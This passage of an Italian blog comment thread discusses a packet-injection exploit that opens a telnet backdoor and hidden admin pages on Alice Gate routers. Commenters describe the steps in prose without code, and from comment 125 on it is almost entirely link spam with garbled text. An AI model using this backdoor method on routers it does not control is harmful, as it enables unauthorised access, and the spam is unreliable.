    Innanzitutto complimenti per l’exploit e per la partecipazione al meeting in Malesia. Purtroppo anche io ho problemi creando il template con colasoft, non potendo nenache prendere spunto dal template di esempio poiche’ il link non funziona.
    Domanda: potresti mandarlo anche a me via posta come hai fatto in precedenza con Fabri?
    Grazie in anticipo..

  53. Risolto e router aperto ;)
    Grazie mille per aver resa nota la tua tecnica di hacking “non invasiva” a tutta la comunita’ !!!
    Applauso…
    :D D

  54. ciao
    mi aggiungo alla lunga lista di complimenti per il lavoro.
    Vorrei segnalarti che non sono riuscito a scaricare il file da rapidshare.
    Trovando il sorgente da qualche altro sito non sono riuscito a compilarlo perchè mancava un md5.h valido (ne ho cercati un po’ ma non quello che serviva).
    Volevo segnalare a tutti che una volta ottenuto l’accesso in telnet si ha l’accesso all’applicazione …. non al sistema..(io non sono riuscito ad ottenerlo).
    Oltre a rinnovarti i miei complimenti mi piacerebbe sapere come sei riuscito a scoprire questo buco.

  55. Ciao
    mi aggiungo alla lunga lista di complimenti per il lavoro.
    Vorrei segnalarti che non sono riuscito a scaricare il file da rapidshare.
    Trovando il sorgente da qualche altro sito non sono riuscito a compilarlo perchè mancava un md5.h valido (ne ho cercati un po’ ma non quello che serviva).
    Lo script .sh mi piace.
    Volevo segnalare a tutti che una volta ottenuto l’accesso in telnet si ha l’accesso all’applicazione …. non al sistema..(io non sono riuscito ad ottenerlo).
    Oltre a rinnovarti i miei complimenti mi piacerebbe sapere come sei riuscito a scoprire questo buco.

  56. Ciao e pur essendo l’ultimo complimenti per il lavoro fatto!
    Ho provato il tutto ma evidentemente sbaglio nello scrivere il payload (o qualcos’altro) in Colasoft.
    Ti chiedo cortesemente, come già fatto da altri, il template che non è più scaricabile da rapidshare.
    p.s. Dove vedo la risposta in Colasoft al pacchetto ?

    Comunque mitico !

  57. COme richiesto da molti ho aggiornato il link al template del pacchetto per Colasost Packet Builder.

    Per monitorare la reazione del modem vi consiglio di usare Wireshark come sniffer di pacchetti.

    Ciao

  58. Ciao,
    volevo chiederti se c’è modo di disibalitare i servizi attivati con l’exploit o se le modifiche al router restano permanenti…insomma, è possibile “resettare” il router allo stato iniziale dopo aver aperto le backdoor?

  59. Ciao PaiMei,

    puoi resettare il modem tenendo premuto il tasto rosso di reset presente dietro al modem per circa 20 secondi durante l’accensione.
    Oppure da telnet.

  60. Ho seguito la procedura in questo modo:

    tramite colasoft apro il file PacketTemplate.cscpkt e modifico mac del router e quello della scheda del pc, ip router e ip pc, seleziono poi la voce extra data e sostituisco la relativa parte esadecimale selezionata con quella generata da md5.exe. Invio poi il pacchetto tramite il tasto send accettando le opzioni di default. Apro il router al 192.168.1.1 ma non è cambiato nulla. Probabilmente sbaglio qualcosa. Ho provato varie volte ma nulla non riesco. Il router è un Alice Gate 2 plus hardware L1 software AGB_3.2.4

  61. @Aldo,

    prima di tutto acceratti che il pacchetto arrivi a destinazione disabilitando il firewall e l’antivirus del pc.
    POi sappi che la pagina web estesa la trovi su http://192.168.1.1/main.html.
    Su http://192.168.1.1 c’è sempre l’interfaccia telecom.

    Ciao

  62. Sono riuscito. Ho capito dove sbagliavo. Mi ero perso il passaggio dove bisogna modificare il mac address del router nel template per generare il payload. Questo metodo è eccezionale. Auguri di buon Natale a tutti. Ciao, grazie.

  63. ciao è stata scoperta la procedura per sbloccare agpf_4.5.0?passando a tiscali mi ritrovo in mano un router di cui non me ne faccio nulla!

  64. evidentemente hai sbagliato a creare il file del payload.
    Devi usare un editor esadecimale, non un editor di testo.

    Ciao

  65. ciao, ho provato a inviare il pacchetto opportunamente modificato con colasoft, ma non sono riuscito a sbloccare nulla.
    wireshark dice “Destination unreachable (Protocol unreachable)”!
    la versione del modem é AGB_3.2.4
    non capisco dove sbaglio…
    ma poi esattamente quali sono le funzionalitá che si vanno a sbloccare?

  66. ciao… Sono riuscito a sbloccare dei modem aga2 plus seguendo questa guida. Ho che tramite telnet e tftp server è possibile aggiornare il firmware. (cosa che prima o poi farò). Prima di fare questo ho notato che sempre tramite tftp è possibile scaricare la configurazione del router relativa hai dati cliente. Mi chiedevo se era possibile, modificando opportunamente i dati cliente, far andare questi modem su altro ISP(tiscali, infostrada etc etc…) senza aggiornare firmaware?
    Io ho fatto quache prova senza raggiungere un buon esito scaricando il backup e modificando, con notepad, solo userID e pass… Secondo voi è una cosa fattibile? Qualcuno ha avuto un buon esito?

  67. colsasoft non mi vede la skeda di rete;ho windows 7 64 bit e sto cercando di sbrandizzare un Alice Business Gate Sw: AB_1.2.1 Fw: 3.46
    consigli?
    ciao.

  68. Ho risolto il problema di colasoft;
    non ho capito come iniettare il file modificato, payload?
    come si costruisce e dove si mette?non si capisce bene nella guida;
    ho usato il template scaricato da saxdax, boh…
    qualcuno mi aiuta?

  69. ciao io ne ho uno con firmware AGPF_4.3.5a

  70. Salve, vorrei sapere se con questa procedura il modem passa da bridge a router, io ho un AGPF_4.3.2, il mio problema è che se navigo con la LAN non riesco ad accedere con un altro computer tramite WiFi, mentre se ne collego più di uno in LAN vanno… Stessa cosa se non collego nessun PC in LAN e li connetto tutti in WiFi… Mi risolverà questo problema?

    Grazie.

  71. Salve, scrivo solo per farle i miei complimenti per la soluzione software trovata.
    Ho adottato con successo la sua tecnica per poter gestire un tale router da remoto.
    Grazie.

  72. Grazie, ha funzionato perfettamente! Finalmente posso usarlo in modalita’ router.

  73. @Andrea
    si può utilizzare con altri operatori. Ti rimando al forum del puntotecnico per i dettagli.

    @bari1
    sarebbe utile per gli altri descrivere come hai risolto il problema con Windows 7.

    @Simone
    sì risolverai qeusto problema.

    @Lorenzo, @XPT
    non possono ch efare piacer5e questio tipo di messaggi.
    Grazie

  74. sto provando questo e anche il ponticello sull’hardware per AGA_3.2.6 ma come ben detto da voi non va. avete qlc link a qlc thread in cui si stia provando ad aggiarlo? voglio trasformare Alice Gate in un access point e basta :)

    grazie

  75. l’AGA è sbloccabile ormai in 10 modi diversi da anni.
    Se non riesci con questo metodo vai sul puntetecnicoeadsl e troverai tutte le guide che vuoi.

    Ciao

  76. eh navigato a destra e amanca ma si dice sempre che con 3.2.6 non c’è niente da fare, almeno per la backdoor software. mah ripriverò con il ponticello…

  77. aggiornamento: ho raccolto opinioni qui e li’ e salta fuori che <>

    ora NON HO AVUTO SUCCESSO IN ALCUN MODO…ho ponticellato che sembrava avessi il parkinson ma niente.

    a sto punto mi vien da temere hce abbiano abbassato ulteriormente il timeout o che l’abbiano tolto. mi toccherà ataccarmi in seriale per vedere cosa succede ma devo recuperare il cavo maschio RS232…ufff…

    non ci sono ivnece novità sul fronte hacking software?

  78. scusate non mi aveva preso il pezzo citato: La difficolta` del ponticello non e’ il contatto tra le due piazzole, ma cogliere il momento giusto. Mi spiego maglio, se hai una seriale, puoi vedere che dopo pochi secondi compare una scritta che dice, premere un tasto per bloccare il boot e qui interviene il ponticello.

  79. grazie mille!!! mi sono fatto una forchettina e comincio a striscisare PRIMA di accedere. poi con l’altra mano accendo e il led va rosso. ho già caricato il nuovo firmare grazie!

    si ha MENO di un secondo dall’accensione per farlo

  80. Salve, premettendo che di modem ruter non ci capisco nulla, per il agpf_4.5.0sx è uscito nulla per sboccarlo, sinceramente con tutto quello che ho letto in questi giorni a riguardo, sono andato nel pallone^^

    vi rimgrazio

  81. Ciao complimenti per la guida e il metodo, io però non riesco a capire come si crea il payload, mi puoi dare un aiuto passo a passo per favore?Grazie comunque in anticipo la mia mail è [email protected]

  82. ciao,
    hoseguito tutti i passsaggi della tua guida ma non ottengo nessun risultato. spedito il pacchetto colasoft postatto da te dopo aver inserito indirirro ip e mac del modem e del pirelli e con la payloads ma nulla

    sto rincretinendo

    aitutooooooooooo

  83. Ciao per la risoluzione del problema che si ha con windows 7 e colasoft che non trova il network adapter basta semplicemente eseguire colasoft come amministratore.

  84. Ciao io ho il fw AGA_3.2.6? E’ stato trovato un modo per sbloccarlo?
    In caso contrario che procedura posso eseguire?
    grazie

  85. Ciao saxdax, complimenti per il lavoro svolto.
    Ho un Pirelli Vela, AG3 3.2.4, ho provato ad utilizzare il metodo della backdoor, sia da Windows che da Linux, ma senza successo.
    Ho generato il payload da un file esadecimale contenente il mac riportato sotto al router, ho provato sia compilando il sorgente che con entrambi gli exe compilati da te. Ho inviato il pacchetto sia utlizzando il tuo templateper Colasoft (cambiando ovviamente MACs, IPs e payload) sia con packeth (sotto linux), ma il router non si sblocca.
    Non capisco dove sbaglio, puoi darmi una mano per favore?
    Grazie mille.

  86. Siete grandissimi, ho un router con fw AGB 3.2.4 sbloccato in un attimo!

  87. Mi accodo a coloro i quali interessa sapere se sono disponibili metodi per lo sblocco di S1 AGPF_4.5.0sx

  88. @Nevermore

    contattami per mail.
    Il metodo è lo stesso ma il payload posso fornirtelo io.

    Ciao

  89. @admin
    Dai, non fare il taccagno, condividi TUTTO per benino e buonanotte al secchio !

    Con il magnifico exploit che hai creato, tantissima gente potrebbe pararsi il culo cambiandosi il SSID.

    Non ti basta la gloria?

    Ciao.

  90. Grazie!! Potete dirmi le stringhe che vanno modificate, con quali valori e dove si trovano per riportare il modem (AGB 3.2.4) come era per piacere? (visto che ho la telegestione attivata e non vorrei che mi facessero storie..)

    P.S.: Qualcuno ha mai provato ad installare debian e tipo rtorrent sull’AGB? E’ possibile? C’è qualche guida passo passo per l’AGB?

    Grazie all’admin per questa fantastica procedura e grazie a tutti quelli che risponderanno alle mie domande

  91. ciao Volevo sapere se un AGIA può diventare
    agpf \agif ? come fare ?

  92. Ciao ,
    volevo sapere se su un Agia è possibile cambiare firmware e e caricare un Agpf !
    grazie .

  93. salve ,
    anche io sarei interessato sul cambio Firmware
    della serie AGIA

  94. Buonasera,

    ho inviato una mail riguardo lo sblocco di un AGB 3.2.4. Spero che le sia arrivata e che sia possibile aiutarmi.

    Grazie in anticipo!

  95. Ciao.
    Io ho un Alice 2 plus AGA_3.2.6.
    Ho seguito alla lettera le tue indicazioni ma non sono riuscito ad ottenere il risultato che speravo.
    Se ti mando il mac-address del router mi confermi che sia corretto il payload che ho ottenuto?

    Graazie 1000.
    Ciao.
    Valerio

  96. Salve ho un modem alice gate voip plus wi-fi AGPF_4.5.0 lo voglio far connettere con gli altri gestori .Si può sbloccare ???’potette aiutarmi ??? grazie

  97. Sono nella stessa sitiuazione di Valerio….vale la stessa richiesta….
    grazieeeee!

  98. Ringrazio saxdax sia per la guida che per avermi suggerito il payload giusto in pvt! ;-) Avevo infatti sbagliato ricavandolo dal programma presente nel pack di megaupload mentre invece avrei dovuto ricavarlo dal primo link (sbadato!)
    Ho l’Alice vela e da qualche giorno sono passato a infostrada, adesso cosa devo abilitare per avere la connessione automatica senza l’acesso tramite una connessione a banda larga?

  99. purtroppo per la versione aga 3.2.6 non funziona

  100. Ciao Saxdax,
    ho un AGPF_4.5.0sx che non ne vuol sapere con tutti i metodi sw trovati sul web (peraltro riferiti a versioni precedenti…)
    Per il tuo metodo mi mancano due informazioni:
    – come ricavare il payload per la mia versione
    – quale MAC usare. Da quel che vedo dal file .kry di config, il mio “scatolo” ha un unico MAC che poi coincide con quanto riportato sull’etichetta sotto.
    Anche ARP per 192.168.1.1 mi da lo stesso MAC: possibile che abbia lo stesso indirizzo per tutte le interfacce?

    Ti ringrazio anticipatamente per le info e per il lavoro pubblicato!
    Ciao
    Giorgio

  101. e mettendo caso io abbia un AGIF_1.2.1 hardware F9 …. mi attacco??

  102. ciao ragazzi, davvero interessantissima questa guida! volevo chiedervi se con questa procedura è possibile caricare un firmware custom perchè mi serve per accendere e spegnere il wifi dal tasto reg. grazie mille

  103. Ciao ho un modem alice gate voip plus wi-fi AGPF_4.5.0 lo voglio far connettere con gli altri gestori (infostrada) .Si può sbloccare ???’potette aiutarmi ??? grazie
    é possibile anche dividere la banda sugli IP?

  104. Ciao Saxdax,
    ho un AGPF_4.5.0sx che non riesco sbloccare con il metodo del ponticello
    come devo fare???
    lo voglio far connettere con gli altri gestori teletu
    grazie

  105. Ciao, ho un problema.
    non riesco a capire cosa devo fare con il generatore che ha fatto e con il file hex.
    Io ho messo il mac del router nel file hex e l’ho aperto nel programma.
    Mi da la stringa e poi non so cosa fare. Devo convertirla in esadecimale ?
    Cosa sbaglio. Mi puoi rispondere, grazie.

  106. Ciao, ho un modem alice wifi recuperato (nel senso che abbiamo cambiato provider ma ci è rimasta la macchinetta pagata profumatamente) che vorrei usare per collegarmi wifi. il fatto è che mi chiede una password… un amico mi ha suggerito di mettere in rete il mio router e questo.
    Insomma non riesco a far funzionare niente. Mi puoi aiutare? Grazieeee

    P.S. Uso un macintosh…

  107. Sono disponibili metodi per lo sblocco del router software AGPF_4.5.2 hardware L1.

    Grazie

  108. ma io ho un AGIF_1.2.1 con hardware F10…
    ….come posso fare ?

  109. ragà che significa ponticellare?

  110. anche io ho un AGIF_1.2.1 con HW F9 ma non c’è niente da fare?

  111. Ciao a tutti! Ho provato a seguire la guida descritta sù, ma mi blocco ad un passaggio: dentro Colasfot Packet Builder, che valore esadecimale devo inserire? E dove soprattutto? Non ci sono riusctito! Qualcuno mi aiuti per piacere! Ho il modem “Vela” con firmware AG3_3.2.4. Grazie 1000!

  112. Ciao, io ho un modem alice gate 2 plus (non wi-fi) Pirelli con firmware AGB_3.2.4, come devo fare per procedere allo sblocco?

    Ho scaricato quel programmino da rapidshare, ma non ci ho capito nulla…

    Se sereste così gentili da inviarmi la procedura tramite email ve ne sarei molto grato…

    P.s.: sono abbastanza ignorante in materia

  113. Ciao, ho letto l’articolo con curiosità e ho provato con successo la procedura su di un router alice, complimenti!! ;)
    Vorrei sapere se la stessa procedura si può applicare su un router della Asus con chipset Broadcom BCM96348 appunto, non so se sbaglio io qsa oppure non è applicabile a questo router. Ciao e grazie :)

  114. @ Alessio: ho anch’io un AGIF_1.2.1 F9 e sono riuscito a sbloccarlo seguendo le guide su forum.zibri.org
    Purtroppo bisogna aprire il modem e collegarsi sui pin della seriale per poter effettuare la procedura, ma ne vale la pena.

  115. Ho eseguito la procedura per il packet injection come descritto da voi con successo su un Alice gate AGPF 4.5.0sx. Sono riuscito ad entrare tramite Telnet e sbloccato la pagina di amministrazione. Il link alla pagina http://192.168.1.1/admin.html è di login (Pirelli). Ho provato svariate combinazioni di username & password ma ogni volta mi reindirizza all’index del router. Devo fare quanche altra operazione? Consigli?
    Grazie in anticipo per le eventuali risposte.

  116. Problema risolto.
    C’è un bug nella pagina (o nel mio router). Occorre reinserire i dati di autenticazione 2 volte. La prima volta mi rimanda sempre all’index a prescindere da cosa inserisco nei campi.
    La seconda volta entra correttamente nel menu avanzato.

  117. buongiorno, vorrei aiuto da parte vostra e grazie prima, ho modem alice business gate 2plus e adsl tiscali e vorrei sbloccare il modem per farlo funzionare con tiscali…mi potete aiutare….grazie 10000000000!

  118. ciao. Possiedo il nuovo router ALICE WIFI N distribiuto da telecom da circa 2 mesi, qualcuno sa come modificarlo per usarlo con infostrada? Grazie

  119. Ciao,
    ho letto con attenzione domande e risposte di questo forum ma credo non ci sia la risposta ad un mio quesito: c’è modo di far funzionare Fritz!Box 7390 su linea Flat Alice casa con voip senza usare il modem Alice gate Voip2 Plus Wi-Fi (Pirelli)? Non ho premesso che Fritz collegato in cascata con Alice Gate funziona ma, dato che vorrei sfruttare le sue funzionalità sulla telefonia, non mi permette di settare adeguatamente le chiamate in entrata sulla mia linea di casa.
    Mi rivolgo a voi vista la lunghissima lista di complimenti meritati e soprattutto per la competenza tecnica dimostrata. Potete aiutarmi? Grazie

  120. Ciao volevo un chiarimento…
    Ho il modem alicegate 2 plus wifi, e sto cercando di passare a infostrada, per cui mi interessa sapere se con la versione software 4.5.0sx potrò connettere tutti i pc di casa al modem senza problemi.
    Ho saputo che con infostrada usando il modem alice c’è il vincolo di un pc connesso!!!
    ti ringrazio e a presto

  121. salve complimenti per la guida… voi si che ci date dentro

    cmq veniamo al dunque sono riuscito ad entrare nel discus del “router” ma non riesco ad entrare nella pagina web di configurazione. da cosa puo dipendere?

  122. Ciao!

    veramente molto interessante!

    iente in vista per i firmware AGPF 4.5.2?

    Grazie in anticipo,

    Paolo

  123. Ciao a tutti,
    qualche anno fa ho fatto la modifica con backdoor al pirelli vela ( alice gate w2+ ).
    Tutto era andato a buon fine, riuscivo a vedere il menu avanzato al seguente indirizzo:
    http://192.168.1.1/admin.html
    UN giorno però cambiai la password di suddetto router, e me la segnai su un foglio.
    Ho perso il foglio purtroppo, e non riesco più a ad accedere al menu avanzato ( il mio obiettivo è quello di riuscire ad attivare controllo accesso e crittografia wep contemporaneamente, ma purtroppo dal menu normale 192.168.1.1 non si riesce, o tengo uno, o tengo l’altro).
    La mia domanda è?
    Esiste un metodo per recuperare la password o resettarla al valore di default “admin”?
    Rifacendo la procedura di sblocco tramite backdoor si resetta la password?

    Esiste un escamotage per evitare tutto questo e riuscire a tenere accesi “controllo accesso ” e “crittografia wep” contemporaneamente?
    PS: il router è della telecom quindi vorrei evitare di strappare le etichette per apire il router e sbloccarlo con il metodo del ponticello, onde evitare di perdere la garanzia.

    Fatemi sapere.

    Grazie mille

  124. Salve, io ho un problema non riesco più ad accedere in wi-fi al router di alice admin e la password (la password non la conosco). admin admin non funziona . Quindi riesco a connettermi al router 192.168.1.1 e poi non riesco ad auteticarmi sempre e solo in wi-fi. Mi raccomando di non rispondermi che devo digitare il reset (NON POSSO . ) . Datemi notizie Grazie


  125. Buy Viagra

    Check Quality Generic Pills Today!…

  126. [email protected]” rel=”nofollow”>.…

    спс!…

  127. [email protected]” rel=”nofollow”>.…

    спасибо….

  128. [email protected]” rel=”nofollow”>.…

    good info!…

  129. [email protected]” rel=”nofollow”>.…

    спс….

  130. [email protected]” rel=”nofollow”>.…

    good….

  131. [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  132. [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó!…

  133. [email protected]” rel=”nofollow”>.…

    thank you….

  134. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  135. [email protected]” rel=”nofollow”>.…

    hello….

  136. [email protected]” rel=”nofollow”>.…

    thank you!…

  137. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  138. [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  139. [email protected]” rel=”nofollow”>.…

    good info!…

  140. [email protected]” rel=”nofollow”>.…

    thanks….

  141. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!…

  142. [email protected]” rel=”nofollow”>.…

    ñïàñèáî….

  143. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  144. [email protected]” rel=”nofollow”>.…

    good….

  145. [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó!!…

  146. [email protected]” rel=”nofollow”>.…

    ñïñ!…

  147. [email protected]” rel=”nofollow”>.…

    good!…

  148. [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!…

  149. [email protected]” rel=”nofollow”>.…

    tnx for info….

  150. [email protected]” rel=”nofollow”>.…

    ñïñ….

  151. [email protected]” rel=”nofollow”>.…

    tnx!…

  152. [email protected]” rel=”nofollow”>.…

    hello!…

  153. [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí!!…

  154. [email protected]” rel=”nofollow”>.…

    good info!!…

  155. [email protected]” rel=”nofollow”>.…

    good info!…

  156. [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  157. [email protected]” rel=”nofollow”>.…

    thank you!…

  158. [email protected]” rel=”nofollow”>.…

    hello!…

  159. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  160. [email protected]” rel=”nofollow”>.…

    tnx!…

  161. [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ….

  162. [email protected]” rel=”nofollow”>.…

    ñïñ….

  163. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!…

  164. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!…

  165. [email protected]” rel=”nofollow”>.…

    ñïñ….

  166. [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí!…

  167. [email protected]” rel=”nofollow”>.…

    good info!…

  168. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó….

  169. [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó!…

  170. [email protected]” rel=”nofollow”>.…

    tnx!…

  171. [email protected]” rel=”nofollow”>.…

    ñïñ!…

  172. [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ!…

  173. [email protected]” rel=”nofollow”>.…

    thanks for information!!…

  174. [email protected]” rel=”nofollow”>.…

    hello!!…

  175. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  176. [email protected]” rel=”nofollow”>.…

    ñïñ!…

  177. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  178. [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí!…

  179. [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ….

  180. [email protected]” rel=”nofollow”>.…

    ñïñ!!…

  181. [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!…

  182. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!…

  183. [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí….

  184. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  185. [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ….

  186. [email protected]” rel=”nofollow”>.…

    ñïñ!…

  187. [email protected]” rel=”nofollow”>.…

    good info!!…

  188. [email protected]” rel=”nofollow”>.…

    good info!…

  189. [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!…

  190. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  191. [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ!…

  192. [email protected]” rel=”nofollow”>.…

    tnx for info….

  193. na[email protected]” rel=”nofollow”>.…

    tnx for info….

  194. [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ….

  195. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  196. [email protected]” rel=”nofollow”>.…

    hello!…

  197. [email protected]” rel=”nofollow”>.…

    ñïñ!!…

  198. [email protected]” rel=”nofollow”>.…

    tnx for info!…

  199. [email protected]” rel=”nofollow”>.…

    thank you!…

  200. [email protected]” rel=”nofollow”>.…

    thank you!…

  201. [email protected]” rel=”nofollow”>.…

    tnx for info….

  202. [email protected]” rel=”nofollow”>.…

    thanks for information!!…

  203. [email protected]” rel=”nofollow”>.…

    tnx!!…

  204. [email protected]” rel=”nofollow”>.…

    tnx for info!…

  205. [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó….

  206. [email protected]” rel=”nofollow”>.…

    ñïñ….

  207. [email protected]” rel=”nofollow”>.…

    thank you….

  208. [email protected]” rel=”nofollow”>.…

    thank you!!…

  209. [email protected]” rel=”nofollow”>.…

    thanks for information….

  210. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!…

  211. [email protected]” rel=”nofollow”>.…

    tnx for info!…

  212. [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  213. [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ!!…

  214. [email protected]” rel=”nofollow”>.…

    ñïàñèáî!!…

  215. [email protected]” rel=”nofollow”>.…

    tnx for info!…

  216. [email protected]” rel=”nofollow”>.…

    hello….

  217. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó….

  218. [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  219. [email protected]” rel=”nofollow”>.…

    tnx for info….

  220. [email protected]” rel=”nofollow”>.…

    ñïñ!!…

  221. [email protected]” rel=”nofollow”>.…

    ñïñ….

  222. [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!!…

  223. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó….

  224. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó….

  225. [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!!…

  226. [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ!…

  227. [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!!…

  228. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!…

  229. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!…

  230. [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí….

  231. [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  232. [email protected]” rel=”nofollow”>.…

    thank you!!…

  233. [email protected]” rel=”nofollow”>.…

    tnx!!…

  234. [email protected]” rel=”nofollow”>.…

    ñïñ!!…

  235. [email protected]” rel=”nofollow”>.…

    tnx for info….

  236. [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!…

  237. [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  238. [email protected]” rel=”nofollow”>.…

    ñïñ….

  239. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!…

  240. [email protected]” rel=”nofollow”>.…

    thanks!…

  241. [email protected]” rel=”nofollow”>.…

    ñïàñèáî!!…

  242. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  243. [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  244. [email protected]” rel=”nofollow”>.…

    ñïñ!…

  245. [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó!…

  246. [email protected]” rel=”nofollow”>.…

    good!!…

  247. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  248. [email protected]” rel=”nofollow”>.…

    tnx!!…

  249. [email protected]” rel=”nofollow”>.…

    good info….

  250. [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  251. [email protected]” rel=”nofollow”>.…

    ñïñ….

  252. [email protected]” rel=”nofollow”>.…

    ñïñ!!…

  253. [email protected]” rel=”nofollow”>.…

    thanks for information!!…

  254. [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  255. [email protected]” rel=”nofollow”>.…

    tnx for info!…

  256. [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí….

  257. [email protected]” rel=”nofollow”>.…

    good!!…

  258. [email protected]” rel=”nofollow”>.…

    ñïñ!…

  259. [email protected]” rel=”nofollow”>.…

    good!!…

  260. [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí….

  261. [email protected]” rel=”nofollow”>.…

    good info….

  262. [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó!…

  263. [email protected]” rel=”nofollow”>.…

    hello….

  264. [email protected]” rel=”nofollow”>.…

    hello!!…

  265. [email protected]” rel=”nofollow”>.…

    good info!…

  266. [email protected]” rel=”nofollow”>.…

    thank you!!…

  267. [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí!!…

  268. [email protected]” rel=”nofollow”>.…

    good….

  269. [email protected]” rel=”nofollow”>.…

    tnx!…

  270. [email protected]” rel=”nofollow”>.…

    tnx for info….

  271. [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!…

  272. [email protected]” rel=”nofollow”>.…

    hello!!…

  273. [email protected]” rel=”nofollow”>.…

    tnx….

  274. [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ….

  275. [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí!!…

  276. [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí!!…

  277. [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí….

  278. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  279. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  280. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  281. [email protected]” rel=”nofollow”>.…

    ñïñ….

  282. [email protected]” rel=”nofollow”>.…

    good info….

  283. [email protected]” rel=”nofollow”>.…

    thank you!!…

  284. [email protected]” rel=”nofollow”>.…

    tnx for info!…

  285. [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó!!…

  286. [email protected]” rel=”nofollow”>.…

    ñïñ!…

  287. [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ….

  288. [email protected]” rel=”nofollow”>.…

    tnx for info!…

  289. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  290. [email protected]” rel=”nofollow”>.…

    ñïàñèáî!!…

  291. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó….

  292. [email protected]” rel=”nofollow”>.…

    tnx for info!…

  293. [email protected]” rel=”nofollow”>.…

    thanks….

  294. [email protected]” rel=”nofollow”>.…

    good info!…

  295. [email protected]” rel=”nofollow”>.…

    good….

  296. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!…

  297. [email protected]” rel=”nofollow”>.…

    thanks for information!!…

  298. [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó….

  299. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó….

  300. [email protected]” rel=”nofollow”>.…

    ñïñ!!…

  301. [email protected]” rel=”nofollow”>.…

    ñïñ….

  302. [email protected]” rel=”nofollow”>.…

    thanks!…

  303. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!…

  304. [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  305. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  306. [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó!…

  307. [email protected]” rel=”nofollow”>.…

    good!!…

  308. [email protected]” rel=”nofollow”>.…

    tnx!!…

  309. [email protected]” rel=”nofollow”>.…

    good!!…

  310. [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ….

  311. [email protected]” rel=”nofollow”>.…

    thank you!!…

  312. [email protected]i” rel=”nofollow”>.…

    tnx for info!…

  313. [email protected]” rel=”nofollow”>.…

    ñïñ!!…

  314. [email protected]” rel=”nofollow”>.…

    thanks for information!…

